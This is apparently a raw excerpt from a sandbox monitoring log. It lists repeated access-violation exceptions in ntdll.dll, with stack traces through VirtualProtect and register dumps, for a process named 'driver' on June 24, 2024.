__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff 0x880fff exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244936 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 registers.r13: 0	1
__exception__ June 24, 2024, 7:45 a.m.	stacktrace: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 @ 0x76d80895 stacktrace+0x84 memdup-0x1af @ 0x73980470 hook_in_monitor+0x45 lde-0x133 @ 0x739742ea New_ntdll_NtProtectVirtualMemory+0x34 New_ntdll_NtQueryAttributesFile-0x151 @ 0x73993603 VirtualProtectEx+0x33 MapViewOfFile-0x2d kernelbase+0x13243 @ 0x7fefd503243 VirtualProtect+0x1b VirtualProtectEx-0x15 kernelbase+0x131fb @ 0x7fefd5031fb driver+0x1be7cf @ 0x1401be7cf GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 0x880fff GetProcessAffinityMask+0x80 SetThreadContext-0x20 kernel32+0x2ef0 @ 0x76c12ef0 driver+0x882000 @ 0x140882000 driver+0x1000 @ 0x140001000 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 0x58c040 exception.instruction_r: 0f ae 81 00 01 00 00 0f 29 81 a0 01 00 00 0f 29 exception.symbol: RtlCaptureContext+0x85 RtlRestoreContext-0xaa ntdll+0x50895 exception.address: 0x76d80895 exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 329877 registers.r14: 0 registers.r15: 0 registers.rcx: 1242680 registers.rsi: 5377630208 registers.r10: 0 registers.rbx: 1992371952 registers.rsp: 1244968 registers.r11: 514 registers.r8: 64 registers.r9: 4 registers.rdx: 1244024 registers.r12: 0 registers.rbp: 0 registers.rdi: 5368709487 registers.rax: 1242360 